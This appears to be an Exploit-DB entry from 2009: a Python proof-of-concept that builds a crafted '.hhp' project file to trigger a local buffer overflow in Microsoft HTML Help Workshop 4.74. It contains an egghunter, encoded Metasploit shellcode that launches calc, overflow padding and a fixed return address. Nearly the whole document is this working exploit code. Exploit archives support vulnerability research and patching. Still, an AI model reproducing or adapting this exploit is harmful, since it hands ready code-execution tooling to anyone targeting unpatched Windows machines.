Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)

EDB-ID:

10321




Platform:

Windows

Date:

2009-12-05


#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and didn't work.I Think it's
# Shellhunter compatibility problem. so i wrote this and used egg hunting-
# method. Would take some time to execute the shellcode,but it will run ;-)
#
#    Tested on : Windows xp sp3
#                Windows 7 ultimate
#



hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
	    "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
            "\x6E\x74\x73\x20\x66\x69\x6C\x65"
            "\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
	    "\x78\x20\x66\x69\x6C\x65\x3D")

crlf      =("\x0d\x0a")

hhp_data2 =("\x5B\x46\x49\x4C\x45\x53\x5D\x0D")

eggh= ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

overflow1= "\x41" * 224


shellcode = "Devil_inside.htm"
shellcode+= "\x69\x72\x61\x71\x69\x72\x61\x71"
#
# windows/exec - 454 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=thread, CMD=calc
#
shellcode+=(
"\x89\xe5\xda\xd6\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x4b\x58\x4c\x49\x47\x70\x47\x70\x43\x30\x45\x30\x4b"
"\x39\x4b\x55\x44\x71\x4a\x72\x51\x74\x4c\x4b\x50\x52\x44\x70"
"\x4c\x4b\x43\x62\x46\x6c\x4e\x6b\x42\x72\x47\x64\x4e\x6b\x42"
"\x52\x46\x48\x44\x4f\x4f\x47\x51\x5a\x45\x76\x50\x31\x4b\x4f"
"\x45\x61\x49\x50\x4e\x4c\x47\x4c\x45\x31\x51\x6c\x43\x32\x44"
"\x6c\x45\x70\x4a\x61\x4a\x6f\x46\x6d\x47\x71\x48\x47\x48\x62"
"\x48\x70\x46\x32\x50\x57\x4e\x6b\x51\x42\x42\x30\x4e\x6b\x42"
"\x62\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47\x30\x42\x58\x4d\x55"
"\x4f\x30\x44\x34\x42\x6a\x46\x61\x4a\x70\x42\x70\x4e\x6b\x42"
"\x68\x44\x58\x4c\x4b\x43\x68\x51\x30\x43\x31\x4e\x33\x49\x73"
"\x47\x4c\x42\x69\x4c\x4b\x45\x64\x4e\x6b\x46\x61\x4b\x66\x50"
"\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x4f\x31\x4a\x6f\x44\x4d"
"\x46\x61\x4f\x37\x46\x58\x4b\x50\x51\x65\x49\x64\x44\x43\x43"
"\x4d\x48\x78\x47\x4b\x43\x4d\x46\x44\x43\x45\x49\x72\x51\x48"
"\x4c\x4b\x46\x38\x51\x34\x47\x71\x4a\x73\x51\x76\x4e\x6b\x44"
"\x4c\x42\x6b\x4e\x6b\x43\x68\x45\x4c\x43\x31\x4b\x63\x4e\x6b"
"\x45\x54\x4c\x4b\x45\x51\x4e\x30\x4f\x79\x51\x54\x44\x64\x51"
"\x34\x51\x4b\x51\x4b\x51\x71\x42\x79\x43\x6a\x42\x71\x49\x6f"
"\x4d\x30\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x44\x52\x48\x6b\x4c"
"\x46\x51\x4d\x43\x5a\x47\x71\x4c\x4d\x4c\x45\x4e\x59\x45\x50"
"\x43\x30\x43\x30\x46\x30\x51\x78\x50\x31\x4e\x6b\x42\x4f\x4c"
"\x47\x4b\x4f\x48\x55\x4f\x4b\x4d\x30\x47\x6d\x44\x6a\x47\x7a"
"\x50\x68\x49\x36\x4f\x65\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47"
"\x4c\x44\x46\x43\x4c\x47\x7a\x4b\x30\x49\x6b\x4d\x30\x43\x45"
"\x43\x35\x4d\x6b\x43\x77\x45\x43\x42\x52\x42\x4f\x42\x4a\x43"
"\x30\x43\x63\x4b\x4f\x4e\x35\x50\x63\x51\x71\x50\x6c\x45\x33"
"\x45\x50\x41\x41")

overflow2= "\x42" * 24
ret = ("\x93\x1f\x40\x00") # Call Edi - hhw.exe (universal huh?)

file=open('Devil.hhp','w')
file.write(hhp_data1+overflow1+eggh+overflow2+ret+crlf+crlf+hhp_data2+crlf+shellcode+"\x41"
* 4000)
file.close()